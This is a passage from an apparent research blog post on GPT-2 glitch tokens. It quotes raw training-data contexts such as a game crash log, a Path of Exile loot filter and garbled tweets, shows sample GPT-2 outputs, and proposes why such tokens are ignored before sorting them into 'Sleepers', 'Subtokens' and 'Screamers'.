demonetisation.\n\nRJD chief Lalu also slammed the BJP for playing the Ram temple card ahead of the Gujarat and Himachal Pradesh elections in order to polarise voters.\n\nCalling the BJP leaders as fake Ram bhakts, Lalu said that these ploys won\'t work for the saffron party anymore.\n\n"Chunav ke samay dikhawati Ram-Ram japnewale ko Ram hi marenge. Bhagwan Ram ko chhalte samay bhi inki rooh nahi kaanpti hai", Lalu wrote on Twitter.\n\n????? ?? ??? ??????? ???-??? ???? ???? ?? ??? ?? ???????? ????? ??? ?? ???? ??? ?? ???? ??? ???? ??????? - Lalu Prasad Yadav (@laluprasadrjd) October 19, 2017\n\nThe RJD chief\'s tirade against the BJP was especially directed against Uttar Pradesh Chief Minister Yogi Adityanath who recently celebrated Diwali in Ayodhya along with his cabinet colleagues.\n\nThe RJD chief maintained that BJP wanted to p
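The "encoding issue" guess can at least be checked for plausibility. This is a minimal Python sketch under an assumption the source does not confirm: that somewhere in the page's pipeline the Devanagari text was forced into an ASCII-only encoding, with unencodable characters replaced by "?". The sample word is "Ram-Ram" in Devanagari, presumably what the second tweet contained given the transliteration in the article. It is written with \u escapes so the snippet stays ASCII.

```python
# "Ram-Ram" in Devanagari: RA, vowel sign AA, MA, hyphen, RA, vowel sign AA, MA.
hindi = "\u0930\u093e\u092e-\u0930\u093e\u092e"

# Assumed failure mode: encode to ASCII and replace every unencodable code point with "?".
mangled = hindi.encode("ascii", errors="replace").decode("ascii")
print(mangled)  # ???-???
```

The result matches the "???-???" visible in the second mangled tweet, and a Hindi word of five code points followed by a hyphen would come out as "?????-" the same way. That fits a lossy encoding step better than anything specific to Twitter, though it does not say where in the pipeline the damage happened.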

 

49781 EngineDebug 3


[239, 63, 1]

Appears as part of "UnityEngineDebugBin", which comes from the file name UnityEngineDebugBindings.gen.cpp. The example below came from a Steam error log for RimWorld.

Unity is a common video game engine.

UnityEngineDebugBin

(Filename: C:/buildslave/unity/build/artifacts/generated/common/runtime/UnityEngineDebugBindings.gen.cpp Line: 42) Received packet from server: PhiClient.ChatMessagePacket (Filename: C:/buildslave/unity/build/artifacts/generated/common/runtime/UnityEngineDebugBindings.gen.cpp Line: 42) Crash!!! SymInit: Symbol-SearchPath: '.;D:\\Steam\\steamapps\\common\\RimWorld;D:\\Steam\\steamapps\\common\\RimWorld;C:\\WINDOWS;C:\\WINDOWS\\system32;SRV*C:\\websymbols*http://msdl.microsoft.com/download/symbols;', symOptions: 530, UserName: 'Jordan' OS-Version: 10.0.14393 () 0x100-0x1 D:\\Steam\\steamapps\\common\\RimWorld\\RimWorldWin.exe:RimWorldWin.exe (01010000), size: 18579456 (result: 0), SymType: '-exported-', PDB: 'D:\\Steam\\steamapps\\common\\RimWorld\\RimWorldWin.exe', fileVersion: 5.4.1.40776 C:\\WINDOWS\\SYSTEM32\n\ntdll.dll:ntdll.dll (76E80000), size: 1585152 (result: 0), SymType: '-exported-', PDB: 'C:\\WINDOWS\\SYSTEM32\n\ntdll.dll', fileVersion: 10.0.14393.479 C:\\WINDOWS\\System32\\KERNEL32.DLL:KERNEL32.DLL (76350000), size: 917504 (result: 0), SymType: '-exported-', PDB: 'C:\\WINDOWS\\System32\\KERNEL32.DLL', fileVersion: 10.0.14393.0 C:\\WINDOWS\\System32\\KERNELBASE.dll:KERNELBASE.dll (76CC0000), size: 1708032 (result: 0), SymType: '-nosymbols-', PDB: 'C:\\WINDOWS\\System32\\K"

 

42470 TextColor 97
 

[215, 80, 74, 57, 22, 17, 15, 15, 11, 10, 10, 10, 10, 8, 8, 7, 6, 6, 6, 6, 6, 6, 5, 5, 4, 4, 4, 4, 4, 3]

Common code element. The biggest contributor was an item filter (loot filter) script for Path of Exile.

Path of Exile item filter script

#----------- # Section: ALPHA # GLOBAL OVERRIDE - ADD YOUR OWN RULES THAT WILL OVERRIDE THE OTHERS HERE # Section: ALPHA-a # Talisman league! Show Rarity = Unique BaseType "Talisman" SetBackgroundColor 0 0 0 SetBorderColor 109 200 130 SetFontSize 42 PlayAlertSound 6 300 Show Rarity = Rare BaseType "Talisman" SetBackgroundColor 0 0 0 SetBorderColor 109 200 130 SetFontSize 40 PlayAlertSound 1 300 Show Rarity = Magic BaseType "Talisman" SetBackgroundColor 0 0 0 SetBorderColor 109 200 130 SetFontSize 38 Show Rarity = Normal BaseType "Talisman" SetBackgroundColor 0 0 0 SetBorderColor 109 200 130 SetFontSize 36 # Section: 0000 # UTILITY AND JUST-IN-CASE Show Class "Microtransactions" Show Class "Quest" "Items" SetBorderColor 74 230 58 SetFontSize 40 # Section: 0001 # LABYRINTH MATERIAL Show BaseType "Offering to the Goddess" SetTextColor 0 0 0 SetBackgroundColor 180 0 0 SetBorderColor 0 0 0 SetFontSize 40 PlayAlertSound 4 300 Show Class "Labyrinth" SetTextColor 74 230 58 SetBorderColor 74 230 58 SetFontSize 40 # Section: 0100 # TOP TIER RARITY Show Class "Fishing Rod" SetTextColor 255 0 0 SetBackgroundColor 255 255 255 SetBorderColor 255 0 0 SetFontSize 45 PlayAlertSound 6 300 Show Rarity = Unique SocketGroup "WWWWWW" BaseType "Simple Robe" SetTextColor 0 0 0 SetBackgroundColor 175 96 37 SetBorderColor 255 150 0 SetFontSize 43 PlayAlertSound 6 300 Show LinkedSockets = 6 SetTextColor 255 0 0 SetBackgroundColor 255 255 255 SetBorderColor 255 0 0 SetFontSize 45 PlayAlertSound 6 300 Show BaseType "Mirror of Kalandra" SetTextColor 255 0 0 SetBackgroundColor 255 255 255 SetBorderColor 255 0 0 SetFontSize 45 PlayAlertSound 6 300 # Section: 0200 # UNIQUES AND MAPS Show # T1 - These uniques are have a consistent price of ~0.5++ ex Rarity = Unique BaseType "Varnished Coat" "Gold Ring" "Ursine Pelt" "Champion Kite Shield" "Sapphire Flask" "Desert Brigandine" "Occultist" "Glorious" "Titanium" "Judgement Staff" "Siege Axe" "Prophecy Wand" "Sacrificial Garb" "Sorcerer Boots" "Topaz 
Flask" "Deicide Mask" "Imperial Skean" "Slaughter Knife" "Rawhide Boots" "Assassin\'s Garb" "Spine Bow" "Ezomyte Burgonet" "Sinner Tricorne" "Two-Stone" "Hubris" "Savant\'s Robe" "Vaal Regalia" "Silver Flask" SetTextColor 175 96 37 SetBackgroundColor 255 255 255 SetBorderColor 175 96 37 SetFontSize 45 PlayAlertSound 6 300 Show # T2 - These uniques usually are worth ~0.5 - 1 ex at the start of the league and drop to ~5c++ (sometimes ranging to an ex and up) over 1 - 2 month. Rarity = Unique BaseType "Golden Plate" "Nubuck Boots" "Terror Maul" "Full Wyrmscale" "Gavel" "Archon Kite Shield" "Reinforced Greaves" "Imperial Bow" "Conjurer Boots" "Steelscale Gauntlets" "Nightmare Bascinet" "Sharkskin Boots" "Granite Flask" "Imperial Staff" "Deerskin Gloves" "Karui Sceptre" "Large Hybrid Flask" "Paua Ring" "Vaal Axe" "Fiend Dagger" SetTextColor 0 0 0 SetBackgroundColor 200 96 37 SetBorderColor 0 0 0 SetFontSize 43 PlayAlertSound 6 300 Show # T2.5 - Fated Uniques. Note: does not apply to every variation of the basetype. Example: The blackheart unique iron ring has a fated version, the le - heup - of - all iron ring unique on the other hand not. Rarity = Unique BaseType "Iron Ring" "Coral Ring" "Jade Amulet" "Plate Vest" "Ornate Sword" "Scholar Boots" "Iron Staff" "Spiraled Wand" "Sledgehammer" "Long Bow" "Crude Bow" "Royal Bow" "Woodsplitter" "Jade Hatchet" "Painted Buckler" "Plank Kite Shield" "War Buckler" "Gilded Sallet" "Iron Hat" "Vine Circlet" "Goathide Gloves" "Coral Amulet" "Fire Arrow Quiver" "Serrated Arrow Quiver" "Death Bow" SetTextColor 175 96 37 254 SetBackgroundColor 15 0 25 SetBorderColor 100 37 254 200 SetFontSize 39 Show # T3 - Random uniques. In some cases, such as jewels some very valuable uniques may be still in here, but it\'s impossible to identify them. 
Rarity = Unique SetTextColor 175 96 37 254 SetBack', 'rmscale" "Gavel" "Archon Kite Shield" "Reinforced Greaves" "Imperial Bow" "Conjurer Boots" "Steelscale Gauntlets" "Nightmare Bascinet" "Sharkskin Boots" "Granite Flask" "Imperial Staff" "Deerskin Gloves" "Karui Sceptre" "Large Hybrid Flask" "Paua Ring" "Vaal Axe" "Fiend Dagger" SetTextColor 0 0 0 SetBackgroundColor 200 96 37 SetBorderColor 0 0 0 SetFontSize 43 PlayAlertSound 6 300 Show # T2.5 - Fated Uniques. Note: does not apply to every variation of the basetype. Example: The blackheart unique iron ring has a fated version, the le - heup - of - all iron ring unique on the other hand not. Rarity = Unique BaseType "Iron Ring" "Coral Ring" "Jade Amulet" "Plate Vest" "Ornate Sword" "Scholar Boots" "Iron Staff" "Spiraled Wand" "Sledgehammer" "Long Bow" "Crude Bow" "Royal Bow" "Woodsplitter" "Jade Hatchet" "Painted Buckler" "Plank Kite Shield" "War Buckler" "Gilded Sallet" "Iron Hat" "Vine Circlet" "Goathide Gloves" "Coral Amulet" "Fire Arrow Quiver" "Serrated Arrow Quiver" "Death Bow" SetTextColor 175 96 37 254 SetBackgroundColor 15 0 25 SetBorderColor 100 37 254 200 SetFontSize 39 Show # T3 - Random uniques. In some cases, such as jewels some very valuable uniques may be still in here, but it\'s impossible to identify them. 
Rarity = Unique SetTextColor 175 96 37 254 SetBackgroundColor 0 0 0 254 SetBorderColor 175 96 37 254 SetFontSize 39 PlayAlertSound 6 300 Show # Maps:Unique Rarity = Unique Class "Maps" SetFontSize 40 PlayAlertSound 6 300 Show # Maps:T1 Class "Maps" BaseType "Crypt" "Desert" "Dunes" "Dungeon" "Grotto" "Pit Map" "Tropical Island" SetFontSize 34 PlayAlertSound 4 200 Show # Maps:T2 Class "Maps" BaseType "Arcade" "Cemetery" "Channel" "Mountain Ledge" "Sewer" "Thicket" "Wharf" SetFontSize 34 PlayAlertSound 4 200 Show # Maps:T3 Class "Maps" BaseType "Ghetto" "Mud Geyser" "Museum" "Quarry" "Reef" "Spider Lair" "Vaal Pyramid" SetFontSize 35 PlayAlertSound 4 200 Show # Maps:T4 Class "Maps" BaseType "Arena" "Overgrown Shrine" "Promenade" "Shore" "Spider Forest" "Tunnel" "Phantasmagoria" SetFontSize 35 PlayAlertSound 4 200 Show # Maps:T5 Class "Maps" BaseType "Bog Map" "Coves" "Graveyard" "Pier" "Underground Sea" "Villa Map" SetFontSize 36 PlayAlertSound 4 200 Show # Maps:T6 Class "Maps" BaseType "Arachnid" "Catacomb" "Colon', 'e "Bog Map" "Coves" "Graveyard" "Pier" "Underground Sea" "Villa Map" SetFontSize 36 PlayAlertSound 4 200 Show # Maps:T6 Class "Maps" BaseType "Arachnid" "Catacomb" "Colonnade" "Dry Woods" "Strand" "Temple" SetFontSize 38 PlayAlertSound 4 200 Show # Maps:T7 Class "Maps" BaseType "Jungle Valley" "Terrace" "Torture Chamber" "Waste Pool" "Abandoned Cavern" SetFontSize 40 PlayAlertSound 4 300 Show # Maps:T8 Class "Maps" BaseType "Canyon" "Cells" "Dark Forest" "Dry Peninsula" "Orchard" SetFontSize 41 PlayAlertSound 4 300 Show # Maps:T9 Class "Maps" BaseType "Arid Lake" "Gorge" "Residence" "Underground River" "Malformation" SetFontSize 41 PlayAlertSound 4 300 Show # Maps:T10 Class "Maps" BaseType "Bazaar" "Necropolis" "Plateau" "Volcano" "Chateau" SetFontSize 42 PlayAlertSound 4 300 Show # Maps:T11 Class "Maps" BaseType "Academy" "Crematorium" "Precinct" "Springs" SetFontSize 42 PlayAlertSound 4 300 Show # Maps:T12 Class "Maps" BaseType "Arsenal" "Overgrown 
Ruin" "Shipyard" "Village Ruin" SetTextColor 0 0 0 SetBackgroundColor 200 200 200 SetBorderColor 0 0 0 SetFontSize 43 PlayAlertSound 4 300 Show # Maps:T13 Class "Maps" BaseType "Courtyard" "Excavation" "Wasteland" "Waterways" SetTextColor 0 0 0 SetBackgroundColor 200 200 200 SetBorderColor 0 0 0 SetFontSize 44 PlayAlertSound 4 300 Show # Maps:T14 Class "Maps" BaseType "Shrine" "Conservatory" "Palace" "Plaza" "Vaal Temple" SetTextColor 0 0 0 SetBackgroundColor 200 200 200 SetBorderColor 0 0 0 SetFontSize 45 PlayAlertSound 4 300 Show # Maps:T15 Class "Maps" BaseType "Abyss" "Colosseum" "Core" SetTextColor 0 0 0 SetBackgroundColor 255 255 255 SetBorderColor 0 0 0 SetFontSize 45 PlayAlertSound 6 300 Show Class "Maps" SetFontSize 44 PlayAlertSound 4 300 Show Class "Map Fragments" BaseType "Mortal Hope" SetTextColor 0 0 0 SetBackgroundColor 255 255 255 SetBorderColor 0 0 0 SetFontSize 45 PlayAlertSound 6 300 Show Class "Map Fragments" BaseType "Eber\'s Key" "Yriel\'s Key" "Inya\'s Key" "Volkuur\'s Key" SetTextColor 0 0 0 SetBackgroundColor 180 0 0 SetBorderColor 0 0 0 SetFontSize 40 PlayAlertSound 4 300 Show Class "Map Fragments" BaseType "Sacrifice at Midnight" SetTextColor 0 0 0 SetBackgroundColor 180 0 0 SetBorderColor 0 0 0 SetFontSize 40 PlayAlertSound 4 300 Show Class "Map Fragments" SetTextColor 0 0 0 SetBackgroundColor 180 0 0 SetBorderColor 0 0 0 SetFontSize 38 PlayAlertSound 4 300 # Section: 0300 # CURRENCY Show BaseType "Eternal Orb" "Divine Orb" "Exalted Orb" "Albino Rhoa Feather" SetTextColor 255 0 0 SetBackgroundColor 255 255 255 SetBorderColor 255 0 0 SetFontSize 45 PlayAlertSound 6 300 Show BaseType "Regal Orb" "Orb of Regret" "Chaos Orb" "Blessed Orb" "Gemcutter\'s Prism" "Orb of Fusing" "Orb of Scouring" "Orb of Alchemy" "Glassblower\'s Bauble" "Vaal Orb" "Cartographer\'s Chisel" "Stacked Deck" SetTextColor 0 0 0 SetBackgroundColor 213 159 15 SetBorderColor 0 0 0 SetFontSize 40 PlayAlertSound 1 300 Show BaseType "Orb of Chance" "Orb of Alteration" 
"Chromatic Orb" "Jeweller\'s Orb" SetTextColor 190 178 135 SetBorderColor 190 178 135 135 SetFontSize 38 Show BaseType "Portal Scroll" "Scroll of Wisdom" SetTextColor 170 158 130 220 SetBorderColor 0 0 0 Show BaseType "Scroll Fragment" SetTextColor 170 158 130 165 SetFontSize 29 Show Class "Divination" BaseType "House of Mirrors" "Wealth and Power" "The Dragon\'s Heart" "The Brittle Emperor" "Celestial Justicar" "Dark Mage" "Doctor" "Fiend" "The Queen" "The Artist" "The Last One Standing" "The Artist" "Bowyer\'s Dream" "Hunter\'s Reward" "The Thaumaturgist" "The Warlord" "The Offering" "The Ethereal" "The Dapper Prodigy" "Abandoned Wealth" "The Enlightened" "Last Hope" "The Devastator" "The Immortal" "The Aesthete" "The Hunger" "Pride Before the Fall" "The King\'s Heart" "Lysah\'s Respite" "Cursed King" "Time-Lost Relic" SetTextColor 0 0 255 SetBackgroundColor 255 255 255 SetBorderColor 0 0 255 SetFontSize 45 PlayAlertSound 6 300 Show Class "Divination" BaseType "The Risk" "Chains that Bind" "The Road to Power" "The Watcher" "Merciless', 'ype "Sacrifice at Midnight" SetTextColor 0 0 0 SetBackgroundColor 180 0 0 SetBorderColor 0 0 0 SetFontSize 40 PlayAlertSound 4 300 Show Class "Map Fragments" SetTextColor 0 0 0 SetBackgroundColor 180 0 0 SetBorderColor 0 0 0 SetFontSize 38 PlayAlertSound 4 300 # Section: 0300 # CURRENCY Show BaseType "Eternal Orb" "Divine Orb" "Exalted Orb" "Albino Rhoa Feather" SetTextColor 255 0 0 SetBackgroundColor 255 255 255 SetBorderColor 255 0 0 SetFontSize 45 PlayAlertSound 6 300 Show BaseType "Regal Orb" "Orb of Regret" "Chaos Orb" "Blessed Orb" "Gemcutter\'s Prism" "Orb of Fusing" "Orb of Scouring" "Orb of Alchemy" "Glassblower\'s Bauble" "Vaal Orb" "Cartographer\'s Chisel" "Stacked Deck" SetTextColor 0 0 0 SetBackgroundColor 213 159 15 SetBorderColor 0 0 0 SetFontSize 40 PlayAlertSound 1 300 Show BaseType "Orb of Chance" "Orb of Alteration" "Chromatic Orb" "Jeweller\'s Orb" SetTextColor 190 178 135 SetBorderColor 190 178 135 135 
SetFontSize 38 Show BaseType "Portal Scroll" "Scroll of Wisdom" SetTextColor 170 158 130 220 SetBorderColor 0 0 0 Show BaseType "Scroll Fragment" SetTextColor 170 158 130 165 SetFontSize 29 Show Class "Divination" BaseType "House of Mirrors" "Wealth and Power" "The Dragon\'s Heart" "The Brittle Emperor" "Celestial Justicar" "Dark Mage" "Doctor" "Fiend" "The Queen" "The Artist" "The Last One Standing" "The Artist" "Bowyer\'s Dream" "Hunter\'s Reward" "The Thaumaturgist" "The Warlord" "The Offering" "The Ethereal" "The Dapper Prodigy" "Abandoned Wealth" "The Enlightened" "Last Hope" "The Devastator" "The Immortal" "The Aesthete" "The Hunger" "Pride Before the Fall" "The King\'s Heart" "Lysah\'s Respite" "Cursed King" "Time-Lost Relic" SetTextColor 0 0 255 SetBackgroundColor 255 255 255 SetBorderColor 0 0 255 SetFontSize 45 PlayAlertSound 6 300 Show Class "Divination" BaseType "The Risk" "Chains that Bind" "The Road to Power" "The Watcher" "Merciless Armament" "The Surveyor" "Rats" "The Vast" "Chaotic Disposition" "Heterochromia" "The Harvester" "The Wind" "Emperor of Purity" "The Mercenary" SetTextColor 0 0 0 SetBackgroundColor 0 210 255 SetBorderColor 0 0 255 SetFontSize 44 PlayAlertSound 1 300 Show Class "Divination" BaseType "The Throne" "Tranquillity" "The Pack Leader" "The Spoiled Prince" "Glimmer" "The Demoness" "The Drunken Aristocrat" "The Fletcher" "Avenger" "Earth Drinker" "The Arena Champion" "The Trial" "Grave Knowledge" "Encroaching Darkness" "Doedre\'s Madness" "Humility" "The Union" "Lucky Connections" "Jack in the Box" "The Inventor" "Hope" "The Hoarder" "Gemcutter\'s Promise" "The Explorer" "Blind Venture" "The Cartographer" "Scholar of the Seas" "Volatile Power" "Lost Worlds" "The Body" "Birth of the Three" "Vinia\'s Token" "The Sigil" "Boundless Realms" "The Stormcaller" "The Lunaris Priestess" "The Jester" "Cartographer\'s Delight" SetTextColor 0 0 0 SetBackgroundColor 110 215 230 235 SetBorderColor 0 110 255 SetFontSize 40 PlayAlertSound 1 300 
Show Class "Divination" BaseType "Carrion Crow" "Other Cheek" SetTextColor 0 0 0 SetBackgroundColor 175 215 230 200 SetBorderColor 0 0 0 SetFontSize 32 Show Class "Divination" SetTextColor 0 0 0 SetBackgroundColor 145 215 230 225 SetBorderColor 0 100 215 SetFontSize 38 PlayAlertSound 1 300 Show Class "Currency" BaseType "Prophecy" SetTextColor 0 0 0 SetBackgroundColor 159 15 213 SetBorderColor 0 0 0 SetFontSize 40 PlayAlertSound 1 300 Show Class "Currency" BaseType "Silver Coin" SetTextColor 0 0 0 SetBackgroundColor 190 178 135 SetBorderColor 0 0 0 SetFontSize 40 PlayAlertSound 1 300 Show Class "Currency" BaseType "Perandus" SetTextColor 255 178 135 SetBorderColor 255 178 135 135 SetFontSize 38 Show Class "Currency" SetBorderColor 0 0 0 Show Class "Stackable" "Currency" SetBorderColor 0 0 0 # Section: 0400 # SOCKET/LINK BASED stuff # 5-links (6 links are handled at the start) Show LinkedSockets = 5 SetBorderColor 0 255 255 SetFontSize 39 PlayAlertSound 1 300 # 6-Sockets Show ItemLevel >= 75 Rarity = Rare Sockets = 6 SetTextColor 255 190 0 SetBackgroundColor ', ' 255 SetFontSize 44 PlayAlertSound 1 300 Show Class "Divination" BaseType "The Throne" "Tranquillity" "The Pack Leader" "The Spoiled Prince" "Glimmer" "The Demoness" "The Drunken Aristocrat" "The Fletcher" "Avenger" "Earth Drinker" "The Arena Champion" "The Trial" "Grave Knowledge" "Encroaching Darkness" "Doedre\'s Madness" "Humility" "The Union" "Lucky Connections" "Jack in the Box" "The Inventor" "Hope" "The Hoarder" "Gemcutter\'s Promise" "The Explorer" "Blind Venture" "The Cartographer" "Scholar of the Seas" "Volatile Power" "Lost Worlds" "The Body" "Birth of the Three" "Vinia\'s Token" "The Sigil" "Boundless Realms" "The Stormcaller" "The Lunaris Priestess" "The Jester" "Cartographer\'s Delight" SetTextColor 0 0 0 SetBackgroundColor 110 215 230 235 SetBorderColor 0 110 255 SetFontSize 40 PlayAlertSound 1 300 Show Class "Divination" BaseType "Carrion Crow" "Other Cheek" SetTextColor 0 0 0 
SetBackgroundColor 175 215 230 200 SetBorderColor 0 0 0 SetFontSize 32 Show Class "Divination" SetTextColor 0 0 0 SetBackgroundColor 145 215 230 225 SetBorderColor 0 100 215 SetFontSize 38 PlayAlertSound 1 300 Show Class "Currency" BaseType "Prophecy" SetTextColor 0 0 0 SetBackgroundColor 159 15 213 SetBorderColor 0 0 0 SetFon

 

43177 EStreamFrame 0 |  39906 EStream 0

GPT2 was very insistent that these were some sort of code. "EStream" in particular always continued as "EStreamControl".

'EStreamFrameEventStart at 42798.88ms, delta: 0.00ms k_EStreamFrame'

Turns out it's part of a Python Steam library module called enums.
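The context snippets in this post were pulled from OpenWebText with regular expressions. A minimal sketch of that kind of lookup is below; the function name `context_windows`, the `width` parameter, and the sample string are illustrative assumptions, not the code actually used.

```python
import re

def context_windows(text, needle, width=40):
    """Return a slice of `text` around every occurrence of `needle`.

    `width` (a hypothetical default) is the number of characters kept on
    each side of a match. Windows for nearby matches may overlap.
    """
    return [
        text[max(0, m.start() - width): m.end() + width]
        for m in re.finditer(re.escape(needle), text)
    ]

# Made-up sample text, loosely modeled on the log line quoted above.
sample = "aaa k_EStreamFrame bbb EStreamFrameEventStart ccc"
for window in context_windows(sample, "EStreamFrame", width=4):
    print(repr(window))
```

Because each window is sliced independently, two nearby matches produce overlapping snippets, which may be one way duplicated stretches end up in raw context dumps.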

 

41383 assetsadobe 0

Always continues as "assetsadobe.com/is/image/content/dam/tnc/nature/en/photos".

A Google search showed that this is a common URL prefix on nature.org. 

Nature.org is probably also the source of the "natureconservancy" glitch token.

 

Non-English Languages

There is surprisingly little bilingual Russian-English text in the dataset. Most Russian appears as large chunks of entirely Russian text. Wikipedia text is occasionally bilingual, which means that ignoring the Russian portion likely increases accuracy for English token prediction.

Note that it isn't just "к" that is a glitch token. Other letters like "и" have the same property. Russian is also generally rare in the training data - some Cyrillic characters are multi-token. 

This also applies to other languages, like Japanese. Also note that Chinese text was almost certainly intentionally excluded from the tokenizer training set - the full-width comma "，" requires 3 tokens, even though it is arguably the most common form of Chinese punctuation! This does not apply to punctuation that is also common in Japanese, like "、" and "。", both of which are single-token. Although Wikipedia and some other sources claim that Japanese also uses the full-width comma, it was extremely rare in the dataset. 
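One way to read these token counts: GPT-2's tokenizer is a byte-level BPE, so a character with no learned merges falls back to one token per UTF-8 byte. The sketch below only counts bytes with the standard library (it does not run the GPT-2 tokenizer), and the helper name `utf8_len` is made up for illustration.

```python
def utf8_len(ch: str) -> int:
    """Number of bytes `ch` occupies in UTF-8.

    For a byte-level BPE tokenizer this is the worst-case token count
    for a character that has no learned merges.
    """
    return len(ch.encode("utf-8"))

# Cyrillic letters, the full-width comma, and two CJK punctuation marks.
for ch in ["к", "и", "，", "、", "。"]:
    print(repr(ch), utf8_len(ch))
```

All three CJK punctuation marks are three bytes long, so "、" and "。" being single tokens suggests their byte sequences were merged during tokenizer training, while the full-width comma's were not.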

 

Hypotheses

Why does this happen?

Firstly, my intuition about low-frequency tokens often being glitch tokens proved true - to a degree. It wasn't just raw frequency, but rather frequency in context. If a particular token doesn't provide extra information about the following tokens, GPT2 will be trained to pay less attention to it. 

Take the following example:

Tengu (天狗) is a type of bird common in Japanese mythology.

At GPT2's level of capability, "天狗" (Tengu in Chinese/Japanese) doesn't provide extra information compared to "Tengu" or the other English words around it. It learns (rightfully) to ignore Japanese text in the middle of English text. In fact, this means it should treat such tokens as null, not even blank space. All the attention vectors from the rest of the prompt should be shifted one token forwards, as though the glitch token never existed. This is the behavior we in fact observe!

Now consider the testing condition:

What is "天狗"?

All the other tokens are pointing towards the location of "天狗", greatly increasing its impact on subsequently generated tokens. At this point one of three things happens: 

  1. The model acts like the glitch token doesn't exist.
  2. The model treats small perturbations in the glitch token as signal, resulting in nonsensical responses, often something close to the model centroid as described here.
  3. The model picks up contextual associations of the glitch token (its "vibes") and gives a vague response in that direction. For example, Cyrillic characters are referred to as "something Russian", while ⓘ, strongly associated with geological data, is called "a geological term which...".

Let's take the glitch token set of "ÃÂÃÂ" and friends. They almost never convey information in any context. We would expect them to do only two things:

  1. Increase the likelihood of more "ÃÂÃÂ" (and longer/shorter variants) in generated text.
  2. Be otherwise completely ignored.

This is also the exact behavior we observe!

prompts: 
" Paris is theÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂ capital of"
" Paris is the capital of"

GPT2 generations

" Paris is theÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂ capital of the world's largest and most populous Arab country, and is one of the largest cities in the world with an area of 1.6 million people (more than half of them in Paris alone). It is home to"
" Paris is the capital of France, and its capital is Paris. The French capital has a population of about 6.5 billion (more than half of the world's population), which is a huge number for a city of this size. In Paris"
" Paris is theÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂ capital of France, the largest state in France and one of the wealthiest in the world. The capital of Paris is home to over 1.2 billion people, and the country's economy is growing at a rapid clip. It"
' Paris is the capital of the European Union. Its population is about 3,500, and it has been under EU sanctions for more than a year. The EU\'s top diplomat has described the bloc as "a global power".\n\nFrance\'s'
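The paired prompts above differ only by the run of "ÃÂ". A small sketch of deriving the control prompt from the glitch prompt, assuming the run is made of the literal two-character unit "ÃÂ" (the names `GLITCH_UNIT` and `strip_glitch_runs` are hypothetical and not from the original experiments):

```python
import re

# Assumed repeating unit of the glitch run; an illustration only.
GLITCH_UNIT = "ÃÂ"

def strip_glitch_runs(prompt, unit=GLITCH_UNIT):
    """Delete every run of one or more repetitions of `unit` from `prompt`."""
    return re.sub("(?:%s)+" % re.escape(unit), "", prompt)

glitch_prompt = " Paris is the" + GLITCH_UNIT * 16 + " capital of"
control_prompt = strip_glitch_runs(glitch_prompt)
print(repr(control_prompt))
```

If glitch tokens really are passed over, generations from `glitch_prompt` and `control_prompt` should look like samples from roughly the same distribution, which is what the comparison above is probing.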

 

 

I would also go further and say that this is the default behavior for any token which either doesn't convey information in a particular context or doesn't appear in the training set at all. So much of the internet is something like:

"bitcoin is currently less than 3% of just the available cash on hand at Apple.In the \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\xe2\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\x80\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\x9cThink Different\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\xe2\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\x80\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\x9d advertisements, we see black and white images from some of"

Here, the best way to predict the next natural language token is to ignore anything that doesn't belong in natural language, pass the information that is present in natural language tokens through the glitch tokens as though the glitch tokens aren't there, and use that information to predict further natural language tokens. This is pretty much what we observe.

I also have a hypothesis that having your vocabulary include tokens which look long and unnatural in natural language helps mitigate catastrophic forgetting. Imagine that your training data for coding includes many uses of a function named "rawdownloadcloneembedreportprint". If you tokenize it as several English words, the relationship between those words in natural language will begin to break down as the model encounters more coding data with that function. Tokenizing it as a single token helps prevent this.

There is also a subset of glitch tokens which tend to "take over" when encountered in natural language. They tend to occur in a context with a lot of natural language tokens, but in an unusual distribution. An example is <45563 'ⓘ' 27>[2], which was mostly present in a long list of something geology-related (list of geological surveys?). In the context of "What is the meaning of", it'll either give a vague but coherent geology-related answer, or go back to listing geological surveys. This behavior also occurs for "petertodd"/"ertodd" and crypto spam. GPT2 is able to tell that they vaguely belong in natural language, but they have such a strong influence on the following text that they often "take over". This behavior decreases as model size increases, with "ertodd" consistently displaying this behavior on the smallest GPT2 model, but rarely on the largest.

I am now very confused about why all the other talk about glitch tokens (including my own, from just a week ago!) sounds so confused. This seems very simple and intuitive and I am utterly shocked I haven't seen anyone else write this exact analysis. It probably exists out there, and I just haven't seen it.

tl;dr: glitch tokens are ignored because they don't convey information in the context where they are used. Information is passed through them as though they don't exist. This sounds extremely obvious in hindsight.

 

 

Glitch token classifications

In conclusion, I think we can divide glitch tokens into 3 main categories.

  1. Sleepers. They are only called upon in specific circumstances, and are treated as non-existent in others. (e.g. short ASCII art, "A" spam, some code elements). This is the largest category of glitch tokens by far.
  2. Subtokens. BPE encoding artifacts (" practition") and tokens which rarely appear away from a particular pattern (" godd" as part of " goddammit"/" goddamned"). The former is generally because of infrequency in the training set. The latter may be due to the relevant information being split across multiple tokens in a human-unintuitive way.
  3. Screamers. These have a very strong prior that was very rarely violated in the training data. They often overpower the influence of all other tokens when shown out of context (e.g. ⓘ). This is especially true if surrounding tokens induce a "spotlight" effect where they increase the attention paid to the Screamer (e.g. "What is the nature of ⓘ?"). This behavior becomes less frequent as model size increases. 

 

Future Research Plans

I'm currently using interpretability tools to identify the exact changes glitch tokens cause to generated text.

 

 

Addendum: The SCP hypothesis

Where on the internet is an "information-less" token often present somewhere you would expect a normal (conversational) word?

That's right, SCP articles. 

Researcher Calvin: ████████ ████? The man who created you? SCP-2785: Correct, though I like to think of ████████ as my father. He made me so he could have a child, I believe, who could carry on his legacy. I feel like I owe it to ████████ for bringing me into this world, despite the cost… Researcher Calvin: Are you referring to [DATA EXPUNGED]? SCP-2785: Yes, [DATA EXPUN

This might explain why a direct interrogative of " What is the nature of <glitch token>?" sometimes results in a creepy/unnerving/existential answer.

I'm including this only because it's funny; I give <1% probability that it has a significant effect.

  1. ^

    I'm counting UTF-8 control characters as resolved here, but those honestly need their own post. 

  2. ^

